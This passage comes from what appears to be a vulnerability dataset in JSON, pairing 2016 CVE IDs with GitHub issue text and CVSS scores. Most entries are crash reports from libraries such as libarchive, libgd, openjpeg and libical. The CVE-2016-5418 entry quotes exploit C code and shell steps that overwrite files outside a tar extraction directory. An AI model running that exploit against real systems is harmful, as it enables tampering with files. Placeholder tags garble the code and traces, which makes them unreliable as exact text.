  2492. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2493. "severity": "MEDIUM",
  2494. "baseScore": 5.5,
  2495. "impactScore": 3.6,
  2496. "exploitabilityScore": 1.8
  2497. },
  2498. {
  2499. "CVE_ID": "CVE-2016-4797",
  2500. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/733",
  2501. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/733",
  2502. "Repo_new": "uclouvain/openjpeg",
  2503. "Issue_Created_At": "2016-03-28T08:56:41Z",
  2504. "description": "division by zero (SIGFPE) error in opj_tcd_init_tile function (line NUMBERTAG of tcd.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG jp2 Starting program: PATHTAG o image.pgm i crashes NUMBERTAG jp2 [INFO] Start to read j2k main header NUMBERTAG INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fc NUMBERTAG d in opj_tcd_init_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG APITAG fraction NUMBERTAG sizeof_block NUMBERTAG manager NUMBERTAG e4) at PATHTAG NUMBERTAG if ((((OPJ_UINT NUMBERTAG l_data_size) < (OPJ_UINT NUMBERTAG l_tilec >y1 l_tilec >y0)) { (gdb) p l_data_size NUMBERTAG gdb) bt NUMBERTAG b7fc NUMBERTAG d in opj_tcd_init_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG APITAG fraction NUMBERTAG sizeof_block NUMBERTAG manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG b in opj_tcd_init_decode_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG be in opj_j2k_read_tile_header (p_j2k NUMBERTAG p_tile_inde NUMBERTAG bfff9e NUMBERTAG p_data_size NUMBERTAG bfff9e NUMBERTAG p_tile NUMBERTAG bfff9e8c, p_tile_y NUMBERTAG bfff9e NUMBERTAG p_tile NUMBERTAG bfff9e NUMBERTAG p_tile_y NUMBERTAG bfff9e NUMBERTAG p_nb_comps NUMBERTAG bfff9e9c, p_go_on NUMBERTAG bfff9e NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in 
opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of l_data_size is zero. The code ((OPJ_UINT NUMBERTAG l_data_size will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a jp2 file to generate the APITAG APITAG APITAG PATHTAG APITAG APITAG PATHTAG APITAG APITAG Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
  2505. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2506. "severity": "MEDIUM",
  2507. "baseScore": 5.5,
  2508. "impactScore": 3.6,
  2509. "exploitabilityScore": 1.8
  2510. },
  2511. {
  2512. "CVE_ID": "CVE-2016-4804",
  2513. "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/25",
  2514. "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/25",
  2515. "Repo_new": "dosfstools/dosfstools",
  2516. "Issue_Created_At": "2016-04-12T16:25:33Z",
  2517. "description": "Heap overflow in function APITAG The attached file will cause a heap overflow in the function read_fat (it's zip packed, because github only allows certain file types). This was found via fuzzing with american fuzzy lop and address sanitizer. Address Sanitizer error message / stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG be NUMBERTAG at pc NUMBERTAG e NUMBERTAG f bp NUMBERTAG ffde1e2f3b0 sp NUMBERTAG ffde1e2eb NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG be NUMBERTAG thread T NUMBERTAG e NUMBERTAG e in __asan_memset ( PATHTAG NUMBERTAG f NUMBERTAG in read_fat PATHTAG NUMBERTAG e NUMBERTAG c in main PATHTAG NUMBERTAG f5e7c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG c NUMBERTAG be NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  2518. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2519. "severity": "MEDIUM",
  2520. "baseScore": 6.2,
  2521. "impactScore": 3.6,
  2522. "exploitabilityScore": 2.5
  2523. },
  2524. {
  2525. "CVE_ID": "CVE-2016-4804",
  2526. "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/26",
  2527. "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/26",
  2528. "Repo_new": "dosfstools/dosfstools",
  2529. "Issue_Created_At": "2016-04-13T22:34:27Z",
  2530. "description": "heap out of bounds read in APITAG An invalid memory read (heap oob) can happen with a malformed filesystem in the function APITAG This was found with american fuzzy lop and address sanitizer. ASAN stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fdc8 at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fff NUMBERTAG e NUMBERTAG sp NUMBERTAG fff NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG fdc8 thread T NUMBERTAG f NUMBERTAG in get_fat PATHTAG NUMBERTAG f NUMBERTAG in read_fat PATHTAG NUMBERTAG e NUMBERTAG c in main PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG af in __libc_start_main APITAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG fdc8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  2531. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2532. "severity": "MEDIUM",
  2533. "baseScore": 6.2,
  2534. "impactScore": 3.6,
  2535. "exploitabilityScore": 2.5
  2536. },
  2537. {
  2538. "CVE_ID": "CVE-2016-4809",
  2539. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/705",
  2540. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/705",
  2541. "Repo_new": "libarchive/libarchive",
  2542. "Issue_Created_At": "2016-05-12T08:21:15Z",
  2543. "description": "memory allocate error. hi guys. Using afl & asan I found some exceptions with memory allocation.",
  2544. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2545. "severity": "HIGH",
  2546. "baseScore": 7.5,
  2547. "impactScore": 3.6,
  2548. "exploitabilityScore": 3.9
  2549. },
  2550. {
  2551. "CVE_ID": "CVE-2016-4855",
  2552. "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/274",
  2553. "Issue_Url_new": "https://github.com/adodb/adodb/issues/274",
  2554. "Repo_new": "adodb/adodb",
  2555. "Issue_Created_At": "2016-08-28T22:46:16Z",
  2556. "description": "XSS vulnerability in old test script. JPCERT Coordination Center (JPCERT/CC) URLTAG reported the following vulnerability in APITAG _As a workaround until hotfix is released, we recommend all users to remove the whole APITAG directory ; it is only used for development purposes and is not necessary for normal APITAG operations._ Report description APITAG Number] JVN NUMBERTAG APITAG APITAG vulnerable to cross site scripting APITAG Related Information] Anonymous (reporter information was not provided) APITAG Information] This vulnerability was found by the reporter Product Name: APITAG Version NUMBERTAG Language: PHP Description: Cross site scripting Reproduction Procedure: Environment used: OS: Windows NUMBERTAG Middleware: Most recent version of xampp Place the most recent version of xampp at APITAG Place APITAG at APITAG Using Chrome with the XSS filter turned off, access APITAG to reproduce the vulnerability. Here an alert dialog will appear. APITAG Impacts] Cookies may be stolen Pages may be defaced Other effects of XSS APITAG Workarounds] None APITAG of Concept Code] None APITAG Information] None APITAG Validation and Comments from IPA] None APITAG from JPCERT/CC] None",
  2557. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2558. "severity": "MEDIUM",
  2559. "baseScore": 6.1,
  2560. "impactScore": 2.7,
  2561. "exploitabilityScore": 2.8
  2562. },
  2563. {
  2564. "CVE_ID": "CVE-2016-4864",
  2565. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1077",
  2566. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1077",
  2567. "Repo_new": "h2o/h2o",
  2568. "Issue_Created_At": "2016-09-14T08:00:27Z",
  2569. "description": "Format String Vulnerability ( CVETAG ). Format string vulnerability exists in FILETAG upto and including version FILETAG NUMBERTAG URLTAG , that can be used by remote attackers to mount Denial of Service attacks. Users using one of the following handlers of H2O may be affected by the issue and are advised to __upgrade immediately to version FILETAG or NUMBERTAG URLTAG __. Affected handlers: FILETAG FILETAG FILETAG FILETAG FILETAG Deployments only using the FILETAG is not affected by the vulnerability.",
  2570. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2571. "severity": "HIGH",
  2572. "baseScore": 7.5,
  2573. "impactScore": 3.6,
  2574. "exploitabilityScore": 3.9
  2575. },
  2576. {
  2577. "CVE_ID": "CVE-2016-5060",
  2578. "Issue_Url_old": "https://github.com/naver/ngrinder/issues/103",
  2579. "Issue_Url_new": "https://github.com/naver/ngrinder/issues/103",
  2580. "Repo_new": "naver/ngrinder",
  2581. "Issue_Created_At": "2016-04-14T02:29:52Z",
  2582. "description": "Fix security issue. Fix ngrinder security issue.",
  2583. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2584. "severity": "MEDIUM",
  2585. "baseScore": 6.1,
  2586. "impactScore": 2.7,
  2587. "exploitabilityScore": 2.8
  2588. },
  2589. {
  2590. "CVE_ID": "CVE-2016-5116",
  2591. "Issue_Url_old": "https://github.com/libgd/libgd/issues/211",
  2592. "Issue_Url_new": "https://github.com/libgd/libgd/issues/211",
  2593. "Repo_new": "libgd/libgd",
  2594. "Issue_Created_At": "2016-05-13T05:35:49Z",
  2595. "description": "APITAG vsnprintf return value not checked leaks memory in PHP NUMBERTAG Description: See reproduction test case, length from the failed vsnprintf attempt NUMBERTAG to copy more than NUMBERTAG chars on a NUMBERTAG buffer, vsnprintf NUMBERTAG a return value of size or more means that the output was truncated\", however libgd returns this length as is and PHP prints more information from memory than it should. Libgd isn't checking the vsnprintf return value and PHP NUMBERTAG will print the length specified, leaking memory data. ERRORTAG This was reported to PHP CVETAG Compile PHP NUMBERTAG with ASAN. BP on URLTAG CODETAG NUMBERTAG URLTAG NUMBERTAG URLTAG / Test script: APITAG Actual result: ERRORTAG",
  2596. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  2597. "severity": "CRITICAL",
  2598. "baseScore": 9.1,
  2599. "impactScore": 5.2,
  2600. "exploitabilityScore": 3.9
  2601. },
  2602. {
  2603. "CVE_ID": "CVE-2016-5301",
  2604. "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/780",
  2605. "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/780",
  2606. "Repo_new": "arvidn/libtorrent",
  2607. "Issue_Created_At": "2016-06-03T13:03:49Z",
  2608. "description": "Libtorrent crashes while parsing invalid chunked HTTP or APITAG response. libtorrent version (or branch NUMBERTAG platform/architecture: Linu NUMBERTAG compiler and compiler version: Ubuntu clang version NUMBERTAG PATHTAG ) (based on LLVM NUMBERTAG A specially crafted HTTP response from a tracker (or potentially a APITAG broadcast) can crash libtorrent in the APITAG function. This bug was found with AFL. Let me know if you need any more information or cannot reproduce. Base NUMBERTAG encoded HTTP response that should crash libtorrent: CODETAG APITAG output: ERRORTAG Valgrind output: ERRORTAG",
  2609. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2610. "severity": "HIGH",
  2611. "baseScore": 7.5,
  2612. "impactScore": 3.6,
  2613. "exploitabilityScore": 3.9
  2614. },
  2615. {
  2616. "CVE_ID": "CVE-2016-5418",
  2617. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/746",
  2618. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/746",
  2619. "Repo_new": "libarchive/libarchive",
  2620. "Issue_Created_At": "2016-07-21T03:42:34Z",
  2621. "description": "Hard links with data can evade sandboxing restrictions. This is the last of four libarchive bugs reported in Issue NUMBERTAG APITAG NUMBERTAG APITAG HEAD/ports NUMBERTAG APITAG non HEAD), possibly earlier APITAG Recall the three classes of filesystem attacks listed earlier NUMBERTAG absolute paths NUMBERTAG dot dot paths NUMBERTAG extraction through symlinks These checks are applied as usual to the pathnames of symlinks and hard links but not to their targets, with one exception: The targets of hard links are subjected to absolute path checks in tar/util.c as of APITAG revision r NUMBERTAG and upstream commit cf8e NUMBERTAG f (it seems the revision was submitted upstream and was rewritten in a different form as the commit both strip leading slashes from the hard link targets, though not for security reasons). Archive entries for hard links can use dot dot pathnames in their targets to point at any file on the system, subject to the usual hard linking constraints. Alternatively, on systems that follow symlinks for APITAG which is an implementation defined behavior supported by APITAG a symlink can first be extracted that uses absolute or dot dot pathnames to point at the file, and then the hard link target can be the symlink, which means that filtering the hard link target for dot dot paths is not sufficient to address the problem. The ability to point hard links at outside files becomes more serious when we consider that libarchive supports the POSIX feature of hard links with data payloads. This allows an attacker to point a hard link at an existing target file outside the extraction directory and use the data payload to overwrite the file. APITAG Exploit code is included below. 
$ cd /tmp/cage $ ls vuln4.c $ cc o vuln4 vuln4.c larchive $ echo hello > /tmp/target $ echo goodbye > data $ ./vuln4 x.tar data p PATHTAG $ tar tvf x.tar rwxrwxrw NUMBERTAG Jan NUMBERTAG p link to PATHTAG $ tar xvf x.tar x p $ cat /tmp/target goodbye The code could be rewritten to use symlinks instead of dot dot paths: $ cd /tmp/cage $ ls vuln4 vuln4.c $ echo hello > /tmp/target $ echo goodbye > data $ ln s /tmp/target sym $ ./vuln4 x.tar data p sym $ tar tvf x.tar rwxrwxrw NUMBERTAG Jan NUMBERTAG p link to sym $ tar xvf x.tar x p $ cat /tmp/target goodbye APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG static void make_archive(char , char , char , char ); static void patch_archive(char , char ); static void make_archive(char archive, char file, char pathname, char linkname) { int fd; ssize_t len; char buf NUMBERTAG struct stat s; struct archive a; struct archive_entry ae; a = APITAG APITAG APITAG archive); ae = APITAG APITAG pathname); / dummy file type AE_SET_HARDLINK has priority anyway / APITAG AE_IFREG); stat(file, &s); archive_entry_set_size(ae, s.st_size); archive_entry_set_uid(ae NUMBERTAG archive_entry_set_gid(ae NUMBERTAG archive_entry_set_perm(ae NUMBERTAG libarchive allows _extraction_ of hardlink payloads, as per the POSIX specs for pax, but not without some arm twisting. We set ctime to force the addition of a pax extended header so that libarchive doesn't zero the size field during _extraction_. libarchive disallows _creation_ of hardlink payloads for all supported tar formats (pax, ustar, gnutar NUMBERTAG tar). If we set the hardlink, libarchive will zero the size field during _creation_, so we simply create a regular file entry and patch the archive on disk via APITAG when done. 
/ archive_entry_set_ctime(ae NUMBERTAG APITAG linkname); / archive_write_header(a, ae); fd = open(file, O_RDONLY); while ((len = read(fd, buf, sizeof buf NUMBERTAG archive_write_data(a, buf, (size_t)len); close(fd); archive_entry_free(ae); archive_write_close(a); archive_write_free(a); patch_archive(archive, linkname); } static void patch_archive(char archive, char linkname) { / extended header + extended body + checksum offset / static const long patch_offset NUMBERTAG FILE fp; unsigned char cp; unsigned long checksum; fp = fopen(archive, \"r+b\"); fseek(fp, patch_offset, SEEK_SET); fscanf(fp, \"%lo\", &checksum); / entry type NUMBERTAG checksum NUMBERTAG cp = (unsigned char )linkname; / linkname char NUMBERTAG while ( cp) checksum += cp++; fseek(fp, patch_offset, SEEK_SET); fprintf(fp NUMBERTAG lo%c NUMBERTAG s\", checksum NUMBERTAG linkname); fclose(fp); } int main(int argc, char APITAG { if (argc NUMBERTAG fprintf(stderr, APITAG %s archive file pathname linkname \", arg NUMBERTAG fprintf(stderr, \" archive output malicious archive here \"); fprintf(stderr, \" file file containing overwrite data \"); fprintf(stderr, \" pathname archive entry pathname \"); fprintf(stderr, \" linkname archive entry linkname \"); fprintf(stderr, \" [can use ../ in linkname] \"); return EXIT_FAILURE; } make_archive(arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG return NUMBERTAG APITAG APITAG POSIX requires that hard links point at only extracted items, though the possibility that a hard link can use a previously extracted symlink as a target and escape the extraction directory should be borne in mind. It seems a good idea to excise the data payload functionality, which is not a mandatory POSIX feature and which does not seem to be widely supported anyway. Look for the lines beginning } else if (r NUMBERTAG a >filesize NUMBERTAG in APITAG in APITAG",
  2622. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  2623. "severity": "HIGH",
  2624. "baseScore": 7.5,
  2625. "impactScore": 3.6,
  2626. "exploitabilityScore": 3.9
  2627. },
  2628. {
  2629. "CVE_ID": "CVE-2016-5727",
  2630. "Issue_Url_old": "https://github.com/SimpleMachines/SMF2.1/issues/3522",
  2631. "Issue_Url_new": "https://github.com/simplemachines/smf/issues/3522",
  2632. "Repo_new": "simplemachines/smf",
  2633. "Issue_Created_At": "2016-07-12T15:01:28Z",
  2634. "description": "Fix CVETAG PHP Object Injection Vulnerability. MENTIONTAG can you verify whether or not this was fixed with this commit: URLTAG per URLTAG",
  2635. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2636. "severity": "HIGH",
  2637. "baseScore": 8.8,
  2638. "impactScore": 5.9,
  2639. "exploitabilityScore": 2.8
  2640. },
  2641. {
  2642. "CVE_ID": "CVE-2016-5824",
  2643. "Issue_Url_old": "https://github.com/libical/libical/issues/286",
  2644. "Issue_Url_new": "https://github.com/libical/libical/issues/286",
  2645. "Repo_new": "libical/libical",
  2646. "Issue_Created_At": "2017-01-20T11:39:03Z",
  2647. "description": "CVETAG : use after free issues. MENTIONTAG has been fuzzing libical last year and found some issues, he reported them first in NUMBERTAG but closed the ticket when he opened the same ticket against thunderbird in the hope to get more answers: CVETAG Also lacking any positive answer there, he published all his fuzzing results here: URLTAG At this point it's not clear whether those issues have been fixed in libical and if they have, it would be nice to know which commit fixed them. This is the point of this ticket. A CVE number has been assigned to those issues: URLTAG (CVE assignment here: URLTAG",
  2648. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2649. "severity": "MEDIUM",
  2650. "baseScore": 5.5,
  2651. "impactScore": 3.6,
  2652. "exploitabilityScore": 1.8
  2653. },
  2654. {
  2655. "CVE_ID": "CVE-2016-5824",
  2656. "Issue_Url_old": "https://github.com/libical/libical/issues/251",
  2657. "Issue_Url_new": "https://github.com/libical/libical/issues/251",
  2658. "Repo_new": "libical/libical",
  2659. "Issue_Created_At": "2016-12-02T14:33:52Z",
  2660. "description": "A heap buffer overflow in icaltime_from_string. Hello, we recently found a memory issue parsing and executing a fuzzed ical file in the last revision of libical ( APITAG We tested this issue on Ubuntu NUMBERTAG but other configurations could be affected. Technical details about the issue are: ERRORTAG gdb backtrace is as follows: ERRORTAG This issue was found using APITAG the file to reproduce it is FILETAG . Regards.",
  2661. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2662. "severity": "MEDIUM",
  2663. "baseScore": 5.5,
  2664. "impactScore": 3.6,
  2665. "exploitabilityScore": 1.8
  2666. },
  2667. {
  2668. "CVE_ID": "CVE-2016-5824",
  2669. "Issue_Url_old": "https://github.com/libical/libical/issues/235",
  2670. "Issue_Url_new": "https://github.com/libical/libical/issues/235",
  2671. "Repo_new": "libical/libical",
  2672. "Issue_Created_At": "2016-05-22T19:42:45Z",
  2673. "description": "Potentially security sensitive crashes, best way to get them to you?. Hello, I have been fuzzing libical for a while, I have a handful of use after frees (might be all the same root bug) I would like to provide, but these are potentially security sensitive and not appropriate for a github comment. An example asan trace (tested against NUMBERTAG and master from NUMBERTAG minutes ago): ERRORTAG What's the best way to get the test cases to reproduce the issues to you? My email is bperry. EMAILTAG if you would like to hit me up directly at your convenience.",
  2674. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2675. "severity": "MEDIUM",
  2676. "baseScore": 5.5,
  2677. "impactScore": 3.6,
  2678. "exploitabilityScore": 1.8
  2679. },
  2680. {
  2681. "CVE_ID": "CVE-2016-5844",
  2682. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/717",
  2683. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/717",
  2684. "Repo_new": "libarchive/libarchive",
  2685. "Issue_Created_At": "2016-06-18T09:18:16Z",
  2686. "description": "signed integer overflow in iso parser. The attached malformed iso file (packed as zip, because github limits attachment file types) will cause a signed integer overflow when passed to \"bsdtar tf FILETAG",
  2687. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2688. "severity": "MEDIUM",
  2689. "baseScore": 6.5,
  2690. "impactScore": 3.6,
  2691. "exploitabilityScore": 2.8
  2692. },
  2693. {
  2694. "CVE_ID": "CVE-2016-6132",
  2695. "Issue_Url_old": "https://github.com/libgd/libgd/issues/247",
  2696. "Issue_Url_new": "https://github.com/libgd/libgd/issues/247",
  2697. "Repo_new": "libgd/libgd",
  2698. "Issue_Created_At": "2016-06-30T13:33:42Z",
  2699. "description": "A read out of bounds was found in the parsing of TGA files. Hi, A read out of bounds was found in the parsing of TGA files using the last revision of libgd APITAG Find FILETAG to reproduce it. The ASAN report is here: ERRORTAG (it is not related to bug NUMBERTAG I just re-used the test case to read an arbitrary TGA file) This issue was found using APITAG Regards, Gustavo.",
  2700. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2701. "severity": "MEDIUM",
  2702. "baseScore": 6.5,
  2703. "impactScore": 3.6,
  2704. "exploitabilityScore": 2.8
  2705. },
  2706. {
  2707. "CVE_ID": "CVE-2016-6136",
  2708. "Issue_Url_old": "https://github.com/linux-audit/audit-kernel/issues/18",
  2709. "Issue_Url_new": "https://github.com/linux-audit/audit-kernel/issues/18",
  2710. "Repo_new": "linux-audit/audit-kernel",
  2711. "Issue_Created_At": "2016-06-27T21:44:05Z",
  2712. "description": "BUG: fix double fetch in APITAG See the mailing list thread below for information: FILETAG Taken from the original report: > In function APITAG the whole argument is fetched from user space twice via APITAG In the first loop, it is firstly fetched (line NUMBERTAG to verify, aka looking for non ascii chars. While in the second loop, the whole argument is fetched again (line NUMBERTAG from user space and used at line NUMBERTAG and line NUMBERTAG respectively depends on the previous verification.",
  2713. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
  2714. "severity": "MEDIUM",
  2715. "baseScore": 4.7,
  2716. "impactScore": 3.6,
  2717. "exploitabilityScore": 1.0
  2718. },
  2719. {
  2720. "CVE_ID": "CVE-2016-6160",
  2721. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/251",
  2722. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/251",
  2723. "Repo_new": "appneta/tcpreplay",
  2724. "Issue_Created_At": "2016-07-06T15:52:58Z",
  2725. "description": "Seg Fault on illegal frame size NUMBERTAG From CVETAG ERRORTAG",
  2726. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2727. "severity": "HIGH",
  2728. "baseScore": 7.5,
  2729. "impactScore": 3.6,
  2730. "exploitabilityScore": 3.9
  2731. },
  2732. {
  2733. "CVE_ID": "CVE-2016-6161",
  2734. "Issue_Url_old": "https://github.com/libgd/libgd/issues/209",
  2735. "Issue_Url_new": "https://github.com/libgd/libgd/issues/209",
  2736. "Repo_new": "libgd/libgd",
  2737. "Issue_Created_At": "2016-05-08T12:06:28Z",
  2738. "description": "global out of bounds read when encoding gif from malformed input with gd2togif. The attached file causes a global out of bounds read error in the function output (gd_gif_out.c), called by APITAG This was found with the help of american fuzzy lop and address sanitizer. To test pass the attached file (zip packed due to github limitations) to gd2togif compiled with address sanitizer. The full address sanitizer error message NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG e4b0 at pc NUMBERTAG bp NUMBERTAG ffc8a6e NUMBERTAG sp NUMBERTAG ffc8a6e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e4b0 thread T NUMBERTAG in output PATHTAG NUMBERTAG fb4a in compress PATHTAG NUMBERTAG b NUMBERTAG a in APITAG PATHTAG NUMBERTAG b NUMBERTAG a in APITAG PATHTAG NUMBERTAG bb NUMBERTAG in APITAG PATHTAG NUMBERTAG f3cc6 in main PATHTAG NUMBERTAG f2ab NUMBERTAG b NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG fa8 in _start ( PATHTAG NUMBERTAG e4b0 is located NUMBERTAG bytes to the left of global variable 'masks' defined in APITAG NUMBERTAG e4c0) of size NUMBERTAG e4b0 is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in APITAG NUMBERTAG e NUMBERTAG of size NUMBERTAG string literal>' is ascii string 'GIF NUMBERTAG a' SUMMARY: APITAG global buffer overflow PATHTAG in output Shadow bytes around the buggy address NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 FILETAG",
  2739. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2740. "severity": "MEDIUM",
  2741. "baseScore": 6.5,
  2742. "impactScore": 3.6,
  2743. "exploitabilityScore": 2.8
  2744. },
  2745. {
  2746. "CVE_ID": "CVE-2016-6172",
  2747. "Issue_Url_old": "https://github.com/PowerDNS/pdns/issues/4128",
  2748. "Issue_Url_new": "https://github.com/powerdns/pdns/issues/4128",
  2749. "Repo_new": "powerdns/pdns",
  2750. "Issue_Created_At": "2016-07-07T07:17:16Z",
  2751. "description": "xfer size issue. URLTAG",
  2752. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H",
  2753. "severity": "MEDIUM",
  2754. "baseScore": 6.8,
  2755. "impactScore": 4.0,
  2756. "exploitabilityScore": 2.2
  2757. },
  2758. {
  2759. "CVE_ID": "CVE-2016-6234",
  2760. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/26",
  2761. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/26",
  2762. "Repo_new": "dropbox/lepton",
  2763. "Issue_Created_At": "2016-07-17T00:55:27Z",
  2764. "description": "Some memory corruptions in lepton. Hi, I at this url you can download some samples that will cause memory corruption problems in lepton: URLTAG you can reproduce with PATHTAG singlethread unjailed preload APITAG /tmp/out.lep NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG decode error in scan0 / mcu2TS_MAIN NUMBERTAG TS_MODEL_INIT_BEGIN NUMBERTAG TS_MODEL_INIT NUMBERTAG TS_READ_STARTED NUMBERTAG TS_READ_FINISHED NUMBERTAG TS_JPEG_DECODE_STARTED NUMBERTAG TS_JPEG_DECODE_FINISHED NUMBERTAG TS_DONE NUMBERTAG bytes needed to decompress this file ::::BILL:::: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG cb NUMBERTAG at pc NUMBERTAG eb NUMBERTAG bp NUMBERTAG ffd0cfd NUMBERTAG sp NUMBERTAG ffd0cfd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG cb NUMBERTAG thread T NUMBERTAG eb NUMBERTAG in std::__atomic_base<unsigned int>::load(std::memory_order) const PATHTAG NUMBERTAG eb NUMBERTAG in std::__atomic_base<unsigned int>::operator unsigned APITAG const PATHTAG NUMBERTAG eb NUMBERTAG in print_bill(int) PATHTAG NUMBERTAG b7f3 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG effabc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG cb NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'billing_map' defined in PATHTAG NUMBERTAG cafc0) of size NUMBERTAG SUMMARY: APITAG unknown crash PATHTAG in std::__atomic_base<unsigned int>::load(std::memory_order) const Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f 